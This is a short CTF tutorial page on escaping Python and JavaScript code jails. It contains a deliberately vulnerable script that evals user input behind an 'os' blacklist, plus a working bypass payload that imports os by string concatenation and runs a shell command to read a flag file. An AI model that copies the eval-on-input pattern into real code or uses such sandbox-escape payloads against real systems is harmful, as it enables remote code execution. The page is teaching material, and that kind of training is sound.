# Jailbreaks

The goal of a jailbreak is to be able to execute code that you’re not supposed to execute (remote code execution) in interpreted languages such as Python or JavaScript.

## General Format of Jailbreak

Generally there is code that gets executed and is "jailed", and you want to gain access to certain actions that you normally wouldn't have access to, such as root privileges.

### Python

Watch out for `exec` and `eval`. These will execute code without checking whether it is safe.

### JavaScript

Watch out for `eval`. This will execute code without checking whether it is safe.

## Basic Payload Example (Python)

```python
# Challenge source: prints itself, then evaluates user input.
print(open(__file__).read())
print("INPUT YOUR CODE HERE")
inp = input()
# Blacklist: reject any input containing the substring 'os'.
if 'os' not in inp:
    eval(inp)  # deliberately unsafe: runs whatever passed the filter
```

The `os` package isn't allowed to be called... or is it? Here is one way to get around the blacklist.

```python
>>> INPUT YOUR CODE HERE
>>> __builtins__.__dict__['__import__']('o'+'s').__dict__['system']('cat flag.txt')
>>> flag{thisisademo}
```

Here `'o'+'s'` builds the string `os` at runtime, so the input never contains the literal substring `os` and passes the filter. There are other ways to solve this challenge too.

### More information

- [Bypass Python Sandboxes](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes)
- [More Python Sandbox Bypass Tricks](https://gist.github.com/luca-m/5130167)
- [Example CTF Writeup](https://tipi-hack.github.io/2019/04/14/breizh-jail-calc.html)

Go work on today's challenges at [ctf.tjcsec.club](https://ctf.tjcsec.club)!